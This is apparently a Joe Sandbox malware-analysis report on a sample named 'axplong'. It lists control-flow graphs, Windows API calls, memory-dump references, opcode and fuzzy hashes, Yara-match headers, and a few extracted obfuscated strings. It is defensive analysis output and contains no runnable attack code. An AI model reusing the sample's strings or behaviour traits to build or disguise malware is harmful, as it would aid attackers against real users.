                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d60d0576d6f35e0d2737785363ace8148142b7b23bf53602f62a4425c98ef60d
                        • Instruction ID: f63f1fbc1c8fdce2fa6112dbdf5d527ca87b9237c8496f756f688cfcc5e94d1d
                        • Opcode Fuzzy Hash: d60d0576d6f35e0d2737785363ace8148142b7b23bf53602f62a4425c98ef60d
                        • Instruction Fuzzy Hash: 2C21F572A052087AEB11BB64AC42FDE77299F43378F214310F9342B1D1DBB09E85B6A1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1476 c16f71-c16f87 1477 c16f97-c16fa7 1476->1477 1478 c16f89-c16f8d 1476->1478 1483 c16fe7-c16fea 1477->1483 1484 c16fa9-c16fbb SystemTimeToTzSpecificLocalTime 1477->1484 1478->1477 1479 c16f8f-c16f95 1478->1479 1480 c16fec-c16ff7 call bfcf21 1479->1480 1483->1480 1484->1483 1486 c16fbd-c16fdd call c16ff8 1484->1486 1488 c16fe2-c16fe5 1486->1488 1488->1480
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00C16FB3
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$LocalSpecificSystem
                        • String ID:
                        • API String ID: 2574697306-0
                        • Opcode ID: ed63b0287de0b1e87fa9c91690aa14133a9ce783e0f7640654cd4251943e3c5f
                        • Instruction ID: d5f79bd200171f87d1fcba4726e9419775348d0b1bbf4df33959b8c5227c02a9
                        • Opcode Fuzzy Hash: ed63b0287de0b1e87fa9c91690aa14133a9ce783e0f7640654cd4251943e3c5f
                        • Instruction Fuzzy Hash: E4111CB290020CAEDB10DED5D940FEFB7BCAB09310F515266F522E2180EB70EB85DB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1489 c1d6ef-c1d6fa 1490 c1d708-c1d70e 1489->1490 1491 c1d6fc-c1d706 1489->1491 1493 c1d710-c1d711 1490->1493 1494 c1d727-c1d738 RtlAllocateHeap 1490->1494 1491->1490 1492 c1d73c-c1d747 call c17443 1491->1492 1500 c1d749-c1d74b 1492->1500 1493->1494 1496 c1d713-c1d71a call c19c81 1494->1496 1497 c1d73a 1494->1497 1496->1492 1502 c1d71c-c1d725 call c18cf9 1496->1502 1497->1500 1502->1492 1502->1494
                        APIs
                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00C1A5ED,?,00C174AE,?,00000000,?), ref: 00C1D731
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 258513ecbae843409d4439fc45e2289303e18b8f8892e971bb4648ed60c090cf
                        • Instruction ID: 40c9a373d2710a64da54f8ce40894b322f63bfa5681d9b550c3c273163d9968e
                        • Opcode Fuzzy Hash: 258513ecbae843409d4439fc45e2289303e18b8f8892e971bb4648ed60c090cf
                        • Instruction Fuzzy Hash: F8F0E931605125769F212A235C11BDB7799EF837B0B188111AC179A1C9CF30E9C076E1

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 9d6e29a15a4afb4ce3e1500a7a7a33c322b315cf937b35c85fe7b303a02573a7
                        • Instruction ID: 86ac4d2fdbd7554fcd18749db8d20b128eda9a1d4ac92be5cc5ef04e8c7e035b
                        • Opcode Fuzzy Hash: 9d6e29a15a4afb4ce3e1500a7a7a33c322b315cf937b35c85fe7b303a02573a7
                        • Instruction Fuzzy Hash: C6F0D135E00608ABC710BB799C07B2E7BA4AB07B60F800398F811672E1DB305A0587D2
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f9a4e1e73026f7a85ae9161decb69940518430a1da1ccfd257f0d541b3b10f0
                        • Instruction ID: e2910453803472aeddaabc812e486cfcdc97bd3e0568f810f3adaf0fec8c7340
                        • Opcode Fuzzy Hash: 4f9a4e1e73026f7a85ae9161decb69940518430a1da1ccfd257f0d541b3b10f0
                        • Instruction Fuzzy Hash: 692106EB24C110BDB24161552B149FA7B6DE7D7330372442FF407CA603EB952A8E7572
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac70f3fe0598f45126a4f541bb4d8ebab3518c68646b1986ffd1224b96487698
                        • Instruction ID: e3ca646168b05ff629b07359b8b01befd8f574db5b7520ea0ccb5dbfccdc05af
                        • Opcode Fuzzy Hash: ac70f3fe0598f45126a4f541bb4d8ebab3518c68646b1986ffd1224b96487698
                        • Instruction Fuzzy Hash: 222108EB24C114BD7241A5456B14AFB7B6EE7C77303B2842FF407CAA02EB951A8E3471
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd1c7f99e67d1a90f534de218e290732a0d1338d3db48853e5b9b116d8c997df
                        • Instruction ID: 598875a8cf928b092b80a557440a11f466b8a99ef5702f6fec912211a3c4c4f2
                        • Opcode Fuzzy Hash: bd1c7f99e67d1a90f534de218e290732a0d1338d3db48853e5b9b116d8c997df
                        • Instruction Fuzzy Hash: 432108EB24C115BD7141A5456B14AFB676EE7D7730372882FF003CA902EB991A8E3171
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 68b3f87d8d704ac23cd9b4c1a772815f4b6a14864fb6198c7fdf04c08e316372
                        • Instruction ID: 7b20b7f9a0d2cd28a9021f4a0b533ba3516fff3c2a91aeb2435f0cc69a07d6c1
                        • Opcode Fuzzy Hash: 68b3f87d8d704ac23cd9b4c1a772815f4b6a14864fb6198c7fdf04c08e316372
                        • Instruction Fuzzy Hash: 1A11C3EB24C114BD7142A5456B049FB7A6EE7D7730372842FF407CA602EB942A8E3472
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d26c60c6a8d9ebe2f1c8eae3445d607dbc0ad5c6afb6a82902ca315fd9f5ec75
                        • Instruction ID: bef948a9f911e9f4c52dbea04ee5e7847240b9fd27d94a624c349a76afcded13
                        • Opcode Fuzzy Hash: d26c60c6a8d9ebe2f1c8eae3445d607dbc0ad5c6afb6a82902ca315fd9f5ec75
                        • Instruction Fuzzy Hash: 8C11E7FB24C2147D7101A15567109FB6B6DE6D7730372843FF403CA506E7951A8E6071
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e156b196cb7217bbbfe01aff0dd4f20d723a8d97b91953cb0521d6cee8698209
                        • Instruction ID: db7313c5a4c1b1eaa712bfcaa252eb35f054b845e7cc896bae6b8d5f5b5924c5
                        • Opcode Fuzzy Hash: e156b196cb7217bbbfe01aff0dd4f20d723a8d97b91953cb0521d6cee8698209
                        • Instruction Fuzzy Hash: 2611D0FB24C114BD7241A5852B109FB67ADEBD7730372882FF403CA606EB941A8E7471
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f73279a532cff8cf2a55afc5dea86f443f60a466a666284c8f91697e4e51e2ca
                        • Instruction ID: f35ac2955321aa147e6561fcbbd66e5d5b6a065222cb44ce76d18d4a71c44922
                        • Opcode Fuzzy Hash: f73279a532cff8cf2a55afc5dea86f443f60a466a666284c8f91697e4e51e2ca
                        • Instruction Fuzzy Hash: 80018FEB24C224BC7141A5423B109FB6BAED6D7730372882FF447C6506EB991A8E3072
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 449253b91d79e240314f601fad8a3178f7d3f907f9eee4648098b72a851b9b20
                        • Instruction ID: 7f04a8f801b2da043593df1a0e17e023ae4220127f1bada5c6da49e37bad99b1
                        • Opcode Fuzzy Hash: 449253b91d79e240314f601fad8a3178f7d3f907f9eee4648098b72a851b9b20
                        • Instruction Fuzzy Hash: E3F081EB24C124BC7141A0423F109FB6BADD6D6730372882FF403C5507DB991A8E3032
                        Memory Dump Source
                        • Source File: 00000009.00000002.3368271255.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_4f80000_axplong.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9319cb5d983ef20901c0112097f9075ec1deb78fa799d680b4acdf4f5b6109bc
                        • Instruction ID: 5b415bae353eee5658ebb78cba949cd2b148f25abaf67efabc477eb95b64de1d
                        • Opcode Fuzzy Hash: 9319cb5d983ef20901c0112097f9075ec1deb78fa799d680b4acdf4f5b6109bc
                        • Instruction Fuzzy Hash: 1A01ADEB64C2A06DB24190523B249FB6B6DD5E3730332882FF442C6507D6890A8E6132
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                        • API String ID: 0-214772295
                        • Opcode ID: 01ff01a8fa2f504e08abec200c1a66a5ea83778b20efc67a7534f82cea733075
                        • Instruction ID: 6d83170205760e15d867b3cb73f512ed0511ebd7dc1fe65e493462ff33f9fbcf
                        • Opcode Fuzzy Hash: 01ff01a8fa2f504e08abec200c1a66a5ea83778b20efc67a7534f82cea733075
                        • Instruction Fuzzy Hash: 4682C170A0428CDBEF14EF68C9497ED7BF6AB46304F5081D8E815673C2D7759A88CB92
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 2e0f1c02fa5c724c8422cbf27484b8712d63bbb58a1bcc9ce26ef3265e87836b
                        • Instruction ID: e8568bb739af4f8a6401b7304faa4e976b0852bf589dd65257de013edc62f74d
                        • Opcode Fuzzy Hash: 2e0f1c02fa5c724c8422cbf27484b8712d63bbb58a1bcc9ce26ef3265e87836b
                        • Instruction Fuzzy Hash: CBC22971E086788FDB25CE28ED407E9B7B5EB88305F1441EAD85DA7640E778AF858F40
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction ID: 41e92c2bdb1d2e9fe1c16d0fc7613621d1926b64c2b3e04bc8a873a91329df17
                        • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                        • Instruction Fuzzy Hash: 78F14071E002299FDF14CFA8D9806AEF7B1FF48314F158269E929AB744D731AE41CB90
                        APIs
                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00BFCE82,?,?,?,?,00BFCEB7,?,?,?,?,?,?,00BFC42D,?,00000001), ref: 00BFCB33
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FilePreciseSystem
                        • String ID:
                        • API String ID: 1802150274-0
                        • Opcode ID: b7d68cf7ca7eb19d67c2bb122fe870b3db3ee797be1d496eaa8cfc662f02c623
                        • Instruction ID: 0668fe4b5a3fe1f2aae9d4b0fa09339fe85c227e0c3fd0a33597ac877d237184
                        • Opcode Fuzzy Hash: b7d68cf7ca7eb19d67c2bb122fe870b3db3ee797be1d496eaa8cfc662f02c623
                        • Instruction Fuzzy Hash: 1ED0223650203C97CA053B90AC06ABDBF589A45B103000151EE09672218E116C924BD0
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction ID: 011af5ef6701027ab9d59b5bfde494aac0e71e81fa013c2a3fb64b109503bcd3
                        • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                        • Instruction Fuzzy Hash: DD51667020C60C5EDF389A6889967FE67FA9F13300F240799D462D76C2DA119FC9B351
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                        • Associated: 00000009.00000002.3362378798.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362421453.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362623294.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3362669493.0000000000EFA000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363627813.0000000000EFB000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3363977193.0000000001097000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000009.00000002.3364039878.0000000001099000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_be0000_axplong.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab90f3aab2689d9dd8254b068a8d534b65494dcac8231fbebffc1d5ed1fb69b3
                        • Instruction ID: 78f0a16c3a1c1d326c1beae038a82a3d52220af302f8589fc9dd0badd52127e3
                        • Opcode Fuzzy Hash: ab90f3aab2689d9dd8254b068a8d534b65494dcac8231fbebffc1d5ed1fb69b3
                        • Instruction Fuzzy Hash: B3225FB7F515144BDB0CCA9DDCA27EDB2E3BFD8214B0E803DA40AE3345EA79D9158A44
                        Memory Dump Source
                        • Source File: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
